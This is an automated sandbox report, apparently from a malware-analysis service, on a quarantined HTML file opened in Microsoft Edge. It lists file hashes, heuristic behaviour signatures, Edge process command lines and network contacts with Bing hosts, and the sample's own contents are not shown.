C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 74d6f818a8ee868b805c3150db7b202e
SHA1 c5680e4c1f0d15fc35a85f431f875348e00b9c42
SHA256 43bec25a2409e9e72d90210652e30f8bc5af87392e761f99e29612733eb83070
SHA512 468ec373b565ce5612ea6e4aecdba302966f0989a728177d2b8f05ef9e95b4bd645abe368524a9eead7fb618ed202440c9bdd272403e5a18776d7ed3ed9f2642

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 618a7bc75348bd0822db78498308f443
SHA1 a5364c63caba42c96a35fbd07f6b1fd132b74954
SHA256 f2091af2c7fad71c5f318dd442634884ec7f04d23404018d61952960ad73fa67
SHA512 a13bff76daf6c7da90080587a2ce57ac373ec1515a8d79477b9e9dbc286bc038b114a123b83c42bed5529251099b3084267bdf59f324be5c3ec72c1de8136658

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 41e25769df61590d65ab348d00070a76
SHA1 859a2ce2b0a1694558b2248fc169835a79167eec
SHA256 547f0746c5c6f42ad0d86b25130408382bd5d1a18bd3378453df7c2b06f559dd
SHA512 f3081050569a2b7270044386abd264a72d768717368eaaa17f51438070b95226f261a81bbeae72bfac8483018f37d50bede3eabbff4d40948ca01ef95bd7b4ef

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1d3d542813d5cc253767e10a54c94caf
SHA1 e8283157e5e63e37024d757efc44b214b9cd1ebf
SHA256 701225ede54aee2f53f8ca8ead03bddc027731eded8f822d23d4c8ddf7a8b1ce
SHA512 62208c1a56a0c53cfad45254809dc7dd462e4559e8596faf1e720391230ad6ad9ae9b237df102186206ec32d266592d05bc86dedc58249009063df502bb64626

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7f67868e5f213626b0a2b4d1f291c7c4
SHA1 44d95bd4a417a4d3bb4a51214f186c79ce699497
SHA256 f135d08cfd6c09340cd191e831b56469bc3635d944163114c74e0320889d2ea5
SHA512 2274d05f0be146718515d110e746c562d8ba830b6d63464593d2decfc051d73c04f925d115a6db24c566720b5cf85e4c1bcda3048347ed13f54883e83c7e489e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 61ad19a336b8d7517d76611d12341253
SHA1 1c5e457d780e0851d6227cfc0f87d8754db15468
SHA256 3efe3c8db583c08adfb303934be9a506ea73b5bf516036c4b86b3d28bb944991
SHA512 627836bf8e61ae73b26657befc096b86be9a977a4407a47b06fca49e9578010a88550bba70aaca49e47c98dff4638a107bceda5bce5fdfd43a5d29d0d421b9c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 252c7f06b51f7445e02ea235c5aa6320
SHA1 23b1706aed751de6a28a74a80a1a07f5f34a7476
SHA256 c97ee628b47bf8aba12cdee4757cb2488a4401b9967b08136a018f9c829ba1af
SHA512 a7dab346c88004c47bc9c447896ec018c5aa7c45caac2e602877ab12053234019cea00b188356618693eed94f8119e8aa40263ee9373dc669062426637b54c1b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c3066d4ee42ae6818586ac8e5fa73cb
SHA1 8c8d4019201a03e5f229c3d393925dc3b0d75982
SHA256 479ddbff1fc776e144cdc27324efd25ff145e0fe3bf810aa16bd9ff0d5da106b
SHA512 4a2faa3fd6598633885d5ceb399da96613bd24b67137097abb32f08e316992ffb0d66057000875129dce691561e44d40a48879d92198e3b3a0acae526c71fdc6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a6b2dc49dda314745a1eb7386f1db948
SHA1 929510267096fbfffd9de695ddf7a8f306e18459
SHA256 11a402830ce22d5262014eb7d3b63bef4401a16a18d52c6f7b9b46cfaef3f025
SHA512 13eb1f477e64c0bfc00f09f403132373e42d8d68141dddf71f0ebd5bef4acc860b250a4c84c42e0e699549a8b2fd37790d9a5a991bad792ca4d06e229132b85d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0f0d56d17be620a29ae3d7a744c66db0
SHA1 98fe169ee27bf727b99f7460736f694cdeaec8ee
SHA256 3d0e83d8bb92245a2b8af9b8376a19fcf337aca14b6a0e8b3fec4093bbb8e10e
SHA512 11b352cf8ef2b6ddae4756c75c08a835e1970291856ae81670f530b361a88f281fa9e9c6a21cc208b0db7a3c8ab4461097fd7dbb336dcfc8a0e43ac95a024f9b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a51a7724ec10acce569195f13c2a6375
SHA1 f68fe782f27ca62727cc3b92ff738f67305173d7
SHA256 3d3842eb7cffe5b4ab15cd93d8ca7e2578a3e4e3473bbdac7f728bdc642b0dad
SHA512 aca36893d06b770f6447f65437a8e413a78194c893d9ee584d61a80594ab775ce8e202eb46029d96f302b7c6f9954c3fed5ab984912066fd5ca1ce6177575a79

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3014a4db4441054a9f855084bc34749a
SHA1 8d4cb94f20efef927f464407e6946de934748aef
SHA256 2f9debc95fb56eb879ab98ddbc457bfc9c2dc79b533bf08dceb71c71e6ad5cfd
SHA512 ee898bc30a7f02af6a898d488974f6bf8da65639135ff7028fb86346abfd3fc0dc5ad712daedc4e9c2287a3f62b523b0ab0177db93e83beb4c80e01b1d136f7f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 57fea08146178e608a209293ff1be0b4
SHA1 f0cbb7ec3528952f8c7f9bb9c8d3394d61f3b0ee
SHA256 bd73c4ff12884a0f4270a3b91b4b4dc310d9336e9ceb1ca71bb9c0a8372e86c0
SHA512 8cf055fcf6d984dc758fe6420b577b02cb540bd455e89e50f0bac24000ccceea177f1599e5acf88e85e40617c30305f7d737a206d065d4a3970822d17f792fca

Analysis: behavioral17

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

131s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2896 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 1280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 1280 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4048 wrote to memory of 2452 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff368746f8,0x7fff36874708,0x7fff36874718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,5344871935703245366,431872264833848507,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 94bd9c36e88be77b106069e32ac8d934
SHA1 32bd157b84cde4eaf93360112d707056fc5b0b86
